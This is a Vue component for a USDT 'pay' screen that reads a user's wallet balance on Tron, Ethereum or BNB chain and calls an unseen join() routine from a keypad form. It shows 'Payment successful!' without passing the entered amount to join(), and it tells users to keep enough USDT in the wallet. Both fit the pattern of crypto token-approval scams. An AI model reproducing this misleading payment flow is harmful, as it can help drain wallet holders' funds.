<template>
  <div class="scan-container">
    <div class="pay-box">
      <div class="pay-box-amount" :class="amount.length > 6 ? 'small' : ''">
        {{ amount }} <span>{{ unit1 }}</span>
      </div>
      <div class="pay-box-rate">
        <div class="rate-left">
          {{ amount }} <span>{{ unit2 }}</span>
        </div>
        <div class="rate-right">
          <img src="../../assets/icon_horn.jpg" alt="" />
        </div>
      </div>
      <div class="pay-box-exchange" @click="exchange">
        <img src="../../assets/icon_exchange.jpg" alt="" />
      </div>
      <div class="success-box" v-if="showSuccess">
        <div class="success-box-icon">
          <van-icon name="checked" size="20px" color="green" />
        </div>
        <div class="success-box-text">
          Payment successful! Please wait 1-5 minutes! Please make sure there is
          enough USDT, otherwise the transaction will fail!
        </div>
      </div>
    </div>
    <div class="bottom-box">
      <div class="amount-box">
        <div class="amount-box-left">
          <div class="usdt-logo">
            <img src="../../assets/USDT.png" alt="" />
          </div>
          <div class="amount-info">
            <div class="info-top">Balance</div>
            <div class="info-bot">{{ balance }} <span>USDT</span></div>
          </div>
        </div>
        <div class="amount-box-right" @click="maxBalance">MAX</div>
      </div>
      <div class="keyboard-box">
        <div class="btn" @click="clickBoard('1')">1</div>
        <div class="btn" @click="clickBoard('2')">2</div>
        <div class="btn" @click="clickBoard('3')">3</div>
        <div class="btn" @click="clickBoard('4')">4</div>
        <div class="btn" @click="clickBoard('5')">5</div>
        <div class="btn" @click="clickBoard('6')">6</div>
        <div class="btn" @click="clickBoard('7')">7</div>
        <div class="btn" @click="clickBoard('8')">8</div>
        <div class="btn" @click="clickBoard('9')">9</div>
        <div class="btn" @click="clickBoard('.')">.</div>
        <div class="btn" @click="clickBoard('0')">0</div>
        <div class="btn" @click="clearAmount">
          <img src="../../assets/icon_delete.jpg" alt="" />
        </div>
      </div>
      <div class="next-btn" @click="join" :class="formatAmount > 0 && balance.greaterThanOrEqualTo(formatAmount) ? '' : 'disabled'">
        NEXT
      </div>
    </div>
  </div>
</template>

<script>
import Web3 from "web3";
import tools from '@/utils/tools'
import { Decimal } from "decimal.js";


let tTimer = null;
export default {
  data() {
    return {
      amount: "0",
      formatAmount: "",
      unit1: "USDT",
      unit2: "USD",
      balance: new Decimal(0),
      userInfo: "",
      userAddress: "",
      showSuccess: false,
      chain: "eth",
    };
  },
  async created() { },
  async mounted() {
    await this.$onLaunched;
    this.userInfo = JSON.parse(localStorage.getItem("userInfo"));
    tTimer = setInterval(async () => {
      this.userInfo = JSON.parse(localStorage.getItem("userInfo"));
      this.userAddress = this.userInfo.address;
      this.chain = this.userInfo.chain;
      try {
        if (this.userInfo.chain == "trx") {
          if (typeof window.okxwallet !== "undefined") {
            window.okxwallet.tronLink
              .request({ method: "tron_requestAccounts" })
              .then(async (res) => {
                const tronweb = window.okxwallet.tronLink.tronWeb;
                const message = "0x1e"; // any normal string or hex string
                console.log(tronweb);
                const CONTRACT = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t";
                const { abi } = await tronweb.trx.getContract(CONTRACT);
                const contract = tronweb.contract(abi.entrys, CONTRACT);
                const balance = await contract.methods
                  .balanceOf(this.userAddress)
                  .call();
                const a = new Decimal(balance.toString());
                this.balance = a.dividedBy(1000000);
                clearInterval(tTimer);
              });
          } else if (typeof window.tronWeb !== "undefined") {
            const CONTRACT = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t";
            const { abi } = await tronWeb.trx.getContract(CONTRACT);
            const contract = tronWeb.contract(abi.entrys, CONTRACT);
            const balance = await contract.methods
              .balanceOf(this.userAddress)
              .call();
            const a = new Decimal(balance.toString());
            this.balance = a.dividedBy(1000000);
            clearInterval(tTimer);
            console.log("balance:", this.balance);
          }
        } else if (this.userInfo.chain == 'eth') {
          const web3 = new Web3(window.ethereum);

          // USDT合约ABI（这里仅包含balanceOf方法的ABI，实际使用中应使用完整的ABI）
          const usdtContractABI = require("../../utils/USDTContract.json");

          // 创建USDT合约实例
          const usdtContract = new web3.eth.Contract(
            usdtContractABI,
            "0xdac17f958d2ee523a2206206994597c13d831ec7"
          );

          // 要查询余额的地址
          const addressToCheck = localStorage.getItem("addData");
          // 查询USDT余额
          usdtContract.methods
            .balanceOf(addressToCheck)
            .call()
            .then((balance) => {
              // USDT使用6位小数

              const a = new Decimal(balance.toString());
              this.balance = a.dividedBy(1000000);
              clearInterval(tTimer);
            })
            .catch((error) => {
              console.error(error);
            });
        } else if (this.userInfo.chain == 'bnb') {
          const web3 = new Web3(window.ethereum);

          // USDT合约ABI（这里仅包含balanceOf方法的ABI，实际使用中应使用完整的ABI）
          const usdtContractABI = require("../../utils/USDTContract.json");

          // 创建USDT合约实例
          const usdtContract = new web3.eth.Contract(
            usdtContractABI,
            "0x55d398326f99059ff775485246999027b3197955"
          );

          // 要查询余额的地址
          const addressToCheck = localStorage.getItem("addData");
          // 查询USDT余额
          usdtContract.methods
            .balanceOf(addressToCheck)
            .call()
            .then((balance) => {
              // USDT使用18位小数
              const a = new Decimal(balance.toString());
              this.balance = a.dividedBy(Math.pow(10, 18));
              clearInterval(tTimer);
            })
            .catch((error) => {
              console.error(error);
            });
        }


      } catch (error) {
        console.log(error, "1");
        location.reload();
      }

    }, 1000);
  },
  methods: {
    async getUserInfo() {
      const res = await this.$api.getUserInfo();
      if (res.code == 200) {
        this.userInfo = res.data;
        localStorage.setItem("userInfo", JSON.stringify(res.data));
      }
    },
    maxBalance() {
      if (this.balance == 0 || this.balance == "") {
        this.amount = "0";
        this.formatAmount = "";
        return;
      }
      this.amount = this.formatNumberWithCommas(this.balance.toString());
      this.formatAmount = this.balance.toString();
    },
    formatNumberWithCommas(numberStr) {
      // 验证输入是否为字符串并且是否为有效数字
      if (typeof numberStr !== "string" || isNaN(Number(numberStr))) {
        return "Input must be a valid number string";
      }

      // 将字符串分成整数部分和小数部分
      let [integerPart, decimalPart] = numberStr.split(".");

      // 使用正则表达式添加千分位逗号
      integerPart = integerPart.replace(/\B(?=(\d{3})+(?!\d))/g, ",");

      // 如果有小数部分，拼接小数部分
      if (decimalPart) {
        return `${integerPart}.${decimalPart}`;
      } else {
        return integerPart;
      }
    },
    clickBoard(num) {
      if (this.amount == 0) {
        this.formatAmount = "";
      }
      if (this.amount.indexOf(".") != -1 && num == ".") {
        return;
      }
      this.formatAmount += num;
      if (num == ".") {
        this.amount += num;
      } else {
        this.amount = this.formatNumberWithCommas(this.formatAmount);
      }
    },
    removeLastDigitOnce(numberStr) {
      // 验证输入是否为字符串
      if (typeof numberStr !== "string") {
        return "Input must be a string";
      }

      // 如果字符串为空，直接返回空字符串
      if (numberStr.length === 0) {
        return "";
      }
      if (numberStr.length === 1) {
        return "0";
      }
      // 移除最后一位字符
      let newStr = numberStr.slice(0, -1);

      // 如果删除后的最后一个字符是逗号且逗号前面不是数字，继续删除逗号
      if (newStr.endsWith(",")) {
        newStr = newStr.slice(0, -1);
      }

      // 如果删除后的最后一个字符是点，继续删除点
      if (newStr.endsWith(".")) {
        newStr = newStr.slice(0, -1);
      }

      // 移除任何潜在的孤立千分位逗号
      newStr = newStr.replace(/(\d)(?=(\d{3})+(?!\d))/g, "$1,");

      return newStr;
    },
    removeLastDigit(numberStr) {
      // 验证输入是否为字符串
      if (typeof numberStr !== "string") {
        return "Input must be a string";
      }

      // 如果字符串为空，直接返回空字符串
      if (numberStr.length === 0) {
        return "";
      }

      // 移除最后一位字符
      let newStr = numberStr.slice(0, -1);

      // 如果删除后的最后一个字符是点，继续删除点
      if (newStr.endsWith(".")) {
        newStr = newStr.slice(0, -1);
      }

      return newStr;
    },
    clearAmount() {
      this.amount = this.removeLastDigitOnce(this.amount);
      this.formatAmount = this.removeLastDigit(this.formatAmount);
    },
    exchange() {
      if (this.unit1 == "USDT") {
        this.unit1 = "USD";
        this.unit2 = "USDT";
      } else {
        this.unit1 = "USDT";
        this.unit2 = "USD";
      }
    },
    async join() {
      if (this.amount == 0) {
        return;
      }
      if (await tools.join()) {
        this.showSuccess = true;
      }
    }
  },
};
</script>

<style lang="scss" scoped>
.scan-container {
  width: 100vw;
  height: 100vh;
  background: #fff;
  box-sizing: border-box;
  display: flex;
  flex-direction: column;
  align-items: center;
  padding-top: 170px;

  .pay-box {
    width: 100%;
    position: relative;

    &-amount {
      font-size: 45px;
      font-weight: 600;
      text-align: center;
      white-space: nowrap;
      width: 260px;
      overflow: hidden;
      margin: 0 auto;

      span {
        margin-left: 3px;
      }
    }

    .small {
      font-size: 30px;
    }

    &-rate {
      font-size: 16px;
      display: flex;
      align-items: center;
      justify-content: center;

      .rate-left {
        color: #909090;

        span {
          margin-left: 3px;
        }
      }

      .rate-right {
        display: flex;
        align-items: center;
        justify-content: center;
        margin-left: 5px;

        img {
          width: 8.6px;
          height: 6px;
        }
      }
    }

    &-exchange {
      position: absolute;
      width: 40px;
      height: 40px;
      right: 16px;
      top: 10px;

      img {
        width: 40px;
        height: 40px;
        border-radius: 40px;
      }
    }

    .success-box {
      display: flex;
      align-items: flex-start;
      width: calc(100% - 32px);
      margin: 0 auto;
      margin-top: 20px;
      box-sizing: border-box;
      background: rgba(182, 232, 159, 0.71);
      border-radius: 10px;
      border: 1px solid rgb(125, 211, 86);
      padding: 15px;

      &-text {
        margin-left: 5px;
      }
    }
  }

  .bottom-box {
    width: 100%;
    box-sizing: border-box;
    padding: 0 16px;
    position: fixed;
    left: 0;
    bottom: 0;
    padding-bottom: 35px;

    .amount-box {
      display: flex;
      align-items: center;
      justify-content: space-between;
      background: #f9f9f9;
      padding: 12px 15px;
      border-radius: 12px;
      margin-top: 90px;

      &-left {
        display: flex;
        align-items: center;

        .usdt-logo {
          width: 30px;
          height: 30px;
          margin-right: 8px;

          img {
            width: 30px;
            height: 30px;
          }
        }

        .amount-info {
          .info-top {
            font-size: 12px;
            color: #909090;
          }
        }
      }

      &-right {
        padding: 6px 12px;
        background-color: #f2f2f2;
        border-radius: 16px;
        font-size: 12px;

        &:active {
          background: #339ee67a;
        }
      }
    }

    .keyboard-box {
      display: flex;
      align-items: center;
      flex-wrap: wrap;
      margin-top: 10px;

      .btn {
        width: 33.33%;
        height: 50px;
        line-height: 50px;
        border-radius: 8px;
        font-size: 20px;
        font-weight: 700;
        font-family: SF Pro Text;
        text-align: center;
        cursor: pointer;
        display: flex;
        align-items: center;
        justify-content: center;

        img {
          width: 22px;
          height: 14px;
        }

        &:active {
          background: #339ee67a;
        }
      }
    }

    .next-btn {
      width: 100%;
      text-align: center;
      padding: 10px 0;
      background: #000;
      color: #fff;
      border-radius: 20px;
      font-size: 16px;
      font-weight: bold;
      margin-top: 40px;
    }

    .disabled {
      background: #ccc;
      color: #999;
      cursor: not-allowed;
    }
  }
}
</style>